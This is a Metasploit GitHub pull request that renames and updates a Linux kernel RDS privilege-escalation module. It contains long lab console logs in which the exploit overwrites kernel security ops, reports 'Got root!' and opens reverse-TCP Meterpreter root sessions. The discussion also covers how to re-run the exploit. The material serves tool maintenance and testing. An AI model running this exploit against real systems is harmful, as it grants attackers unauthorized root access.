Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Rename exploit/linux/local/rds_priv_esc -> exploit/linux/local/rds_rds_page_copy_user_priv_esc #12744

Merged
merged 3 commits into from Dec 22, 2019

Conversation

@bcoles
Copy link
Contributor

bcoles commented Dec 18, 2019

Rename exploit/linux/local/rds_priv_esc -> exploit/linux/local/rds_rds_page_copy_user_priv_esc to avoid ambiguity. Not the first bug in RDS, and won't be the last RDS msf module.

Also update the module to use the new Msf::Post::Linux::Compile mixin and a few small style changes.

bcoles added 3 commits Dec 18, 2019
…s_page_copy_user_priv_esc
@h00die h00die self-assigned this Dec 22, 2019
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 22, 2019

working on this now, i have a fedora13 box which is vuln to test with, so easy sauce.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 22, 2019

Looks like it isn't re-exploitable. I'll tack that in while landing.

[+] Linux kernel version 2.6.33.3-85.fc13.x86_64 appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Max line length is 65537
[*] Writing 5228 bytes in 1 chunks of 18866 bytes (octal-encoded), using printf
[*] Writing '/tmp/.UqcDf' (237 bytes) ...
[*] Max line length is 65537
[*] Writing 237 bytes in 1 chunks of 734 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xffffffff81d63180
[*]  [+] Resolved default_security_ops to 0xffffffff81a6b490
[*]  [+] Resolved cap_ptrace_traceme to 0xffffffff811bde9a
[*]  [+] Resolved commit_creds to 0xffffffff810699da
[*]  [+] Resolved prepare_kernel_cred to 0xffffffff810698cf
[*] [*] Could not bind socket.

h00die added a commit that referenced this pull request Dec 22, 2019
@h00die h00die merged commit fce7501 into rapid7:master Dec 22, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 22, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 22, 2019

Release Notes

Rename the exploit/linux/local/rds_priv_esc to exploit/linux/local/rds_rds_page_copy_user_priv_esc so other rds exploits can be added without name issues. It also updates rds_rds_page_copy_user_priv_esc to use newer Metasploit libraries.

msjenkins-r7 added a commit that referenced this pull request Dec 22, 2019
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Dec 22, 2019

Looks like it isn't re-exploitable. I'll tack that in while landing.

It is re-exploitable. Did you still have a root session open? You can't get more than one root shell at a time, but if you lose your root shell you can get it back as many times as you'd like.

msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.TimMgNORQ' (237 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:41170) at 2019-12-22 15:31:24 -0500
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Got root!

meterpreter > 
Background session 2? [y/N]  
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.8I4PCZ' (237 bytes) ...
[*] Launching exploit...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Could not bind socket.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > sesions -k 2
[-] Unknown command: sesions.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > sessions -k 2
[*] Killing the following session(s): 2
[*] Killing session 2
[*] 172.16.191.138 - Meterpreter session 2 closed.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.gIneNQVnx' (237 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.138:41171) at 2019-12-22 15:31:59 -0500
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Got root!

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
Background session 3? [y/N]  
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.NjZtYePB' (237 bytes) ...
[*] Launching exploit...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Could not bind socket.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > sessions -k 3
[*] Killing the following session(s): 3
[*] Killing session 3
[*] 172.16.191.138 - Meterpreter session 3 closed.
msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Linux kernel version 2.6.33.3-85.fc13.i686.PAE appears to be vulnerable
[+] RDS kernel module is available
[+] RDS kernel module is loadable
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/.BjXPFJQ' (237 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
[*] Meterpreter session 4 opened (172.16.191.165:4444 -> 172.16.191.138:41172) at 2019-12-22 15:33:10 -0500
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Linux kernel >= 2.6.30 RDS socket exploit
[*] [*] by Dan Rosenberg
[*] [*] Resolving kernel addresses...
[*]  [+] Resolved security_ops to 0xc0b0220c
[*]  [+] Resolved default_security_ops to 0xc098d1d8
[*]  [+] Resolved cap_ptrace_traceme to 0xc056bbfc
[*]  [+] Resolved commit_creds to 0xc0457667
[*]  [+] Resolved prepare_kernel_cred to 0xc0457572
[*] [*] Overwriting security ops...
[*] [*] Overwriting function pointer...
[*] [*] Triggering payload...
[*] [*] Restoring function pointer...
[*] [*] Got root!

meterpreter > 
@bcoles bcoles deleted the bcoles:rds_rds_page_copy_user_priv_esc branch Dec 22, 2019
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 22, 2019

Interesting. I did have my previous root session open. I'll add a PR with that note in the docs later.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Dec 22, 2019

Interesting. I did have my previous root session open. I'll add a PR with that note in the docs later.

This could probably be fixed by redefining the ports used:

#define RECVPORT 5555 
#define SENDPORT 6666

Or perhaps cleanly killing the socket upon completion.

However, I'm not particularly interested in pursuing this further. Closing the socket may or may not affect system stability (unknown, I haven't looked). Redefining the ports is problematic, as pre-compiled exploits are used, and I don't feel like rewriting the C to handle the ports as arguments, standard input, or environment variables.

Although now that I look at the C code, modifying it to execute argv[1] was a dumb idea and unnecessary. I should have left the code as is and just shoved the payload path into stdin, as is tradition.

@h00die h00die mentioned this pull request Jan 4, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.